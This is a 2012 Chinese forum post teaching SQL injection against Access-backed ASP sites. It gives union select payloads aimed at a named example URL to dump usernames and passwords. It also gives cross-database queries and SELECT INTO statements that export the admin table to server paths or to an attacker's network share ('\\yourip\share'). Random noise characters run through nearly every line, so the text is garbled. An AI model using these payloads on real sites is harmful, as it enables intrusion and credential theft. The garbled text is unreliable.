--------------------------------------------------------------" f" z7 J$ K% b+ m, R
union查询法$ I0 e V& r J& H2 {% z0 P
首先要说的就是查询办法,一般的查询办法就是
. G2 g: G2 C, W& U: v. m1 t: ~9 M: L1 L, d. d& K
程序代码, k8 R- q6 j) M9 ]! \4 s& E2 r
and 1=(select count(*) from admin where left(id,1)='1')
" R( v! N& b7 P% w8 J! V3 l. ?8 Z* D) ]% P$ r; K( W! h5 ~, d! y5 K
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯. t8 u! v! L$ C% u& t. A4 _
所以这个时候,union select横空出现.别以为只能在PHP里用哦.... ?- G) d6 |/ |: c8 X/ q1 p2 J
譬如你有一个ACCESS点:5 y' m5 x/ R p" ^6 r9 c% o6 F2 G7 {
程序代码
& v, O) U6 b1 H" f; Khttp://bbs.tian6.com/xiaoyang.asp?coder=1
0 B- A; |9 X1 ~" a0 j* k# F% U6 L5 H3 R* `
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),! M O& ~+ g: s+ ]( J# p/ |
然后我们直接来:
* \1 K, d; D: O! Q9 q程序代码8 y0 g A4 n: d2 o
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]7 B+ P% e; I: f8 N3 \
) ?- w* G% o! I7 [1 \1 O这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
, ^: [( G; j8 f8 i9 p: m' @) v. A. E. K& F% @6 }8 w7 V5 i
\# A8 h! v5 x. j. h5 I" g
( k$ R3 m' x" U8 w" u. F
---------------------------------------------------------------
0 l0 N ?: t+ }8 b) a) _" J) w4 e7 oAccess跨库查询+ b* a( m% E3 p0 {. d6 t3 m! Q$ ]1 _
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
# d R, b) [5 {1 d$ U# h跨库的查询语句:
R: `+ z$ z; b) g% |% S子查询:
4 ~6 x# c/ R; Y4 H7 M# \. r程序代码
. m* j& U* z' ]5 Q9 @and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
' \) N/ U' p7 N, F* H# O3 \. U4 V3 D0 C
union查询:
0 P. n) ]3 k- B$ }# |程序代码
6 e5 Y; W9 T2 E |1 Y5 P$ P6 |union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
& q, K: s# C* n- {2 H- z$ O$ @ }) S
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
4 p$ C7 R7 V# b* K: R3 R程序代码2 Y9 W8 }3 V/ p. Y5 J( ?
http://www.4ngel.net/article/46.htm
2 C" e, b7 m% i: Rhttp://hf110.com/Article/hack/rqsl/200502/66.html
1 k% r# F5 D2 h$ I4 o" k) a+ L, s8 d' f! _& w
--------------------------------------------------------------- W' P+ F8 q8 X- K
Access注入,导出txt,htm,html3 j5 q6 R) W) I5 B) F! D( b) ^
子查询语句:
# m- `$ b/ L+ B2 {8 S+ @8 r) p1 `程序代码: @9 m7 v" M& s8 u+ w, b) {% w7 I
Select * into [test.txt] in 'd:\web\' 'text;' from admin- g* `2 c$ K( R( w% ^7 n& m
( a) R5 y; [1 p9 K+ n6 r
这样就把admin表的内容以test类型存进了d:\web里面.$ X/ N& \; Y" B: n F8 `7 r
UNION查询:
- j& n8 K. K- u i) U, F程序代码: o& T' k0 ~% ~3 Y' e4 d
union select * into [admin.txt] in 'c:\' 'test;' from admin( A/ ?9 [1 ~5 Z# G" L4 T
3 z4 J3 c% ~) P而且这里也可以保存到本地来:$ C8 Y8 b. r2 `4 O$ z0 Q* v
程序代码
. @0 [7 n; o% PSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
2 z& ~3 j5 k7 a% S7 E$ S _2 h2 n0 d! B: {- F1 [0 r/ c. \" k
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
* K5 B( K9 U# y1 Q: \' z; ^3 S* {& J7 {
程序代码% |$ U' u N' K2 p! q) J
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
4 }" A# t3 k& s' e& u, P% P
- r n' v: H" w因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
. c: n5 O- W/ p2 ?" c/ E: k8 r |
发表于 2012-9-15 14:20:57
收藏
支持
反对